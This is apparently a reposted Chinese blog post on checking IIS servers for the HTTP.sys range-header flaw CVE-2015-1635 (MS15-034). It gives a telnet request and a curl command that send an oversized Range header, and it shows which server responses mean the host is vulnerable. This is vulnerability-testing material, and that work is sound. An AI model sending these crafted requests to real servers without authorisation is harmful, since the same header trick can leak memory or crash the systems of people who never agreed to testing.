• HTTP.SYS远程代码执行漏洞测试


    简介:

        在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。

    测试:

    方法1:

    # telnet www.test.com 80
    GET / HTTP/1.1
    Host: stuff
    Range: bytes=0-18446744073709551615

    方法2:

    # curl -v www.test.com -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

    判断是否存在漏洞:

    不存在该漏洞的响应包为:

    HTTP Error 400. The request has an invalid header name.

    存在漏洞的响应包为:

    < HTTP/1.1 416 Requested Range Not Satisfiable
    < Content-Type: text/html
    < Last-Modified: Thu, 22 Aug 2013 23:53:12 GMT
    < Accept-Ranges: bytes
    < ETag: "2edebc2929fce1:0"

    参考链接:http://www.tiaozhanziwo.com/archives/765.html

  • 相关阅读:
    plaidctf2015 uncorrupt png
    Tsinghua dsa pa2
    课上实验-小软件破解
    HBase Block Cache(块缓存)
    JVM垃圾回收(二)- Minor GC vs Major GC vs Full GC
    JVM垃圾回收(一)- 什么是垃圾回收
    HBase Region 各个状态的转换
    HBase架构
    用GraphX分析伴生网络(二)
    用GraphX分析伴生网络(一)
  • 原文地址:https://www.cnblogs.com/Kevin-1967/p/9993281.html
Copyright © 2020-2023  润新知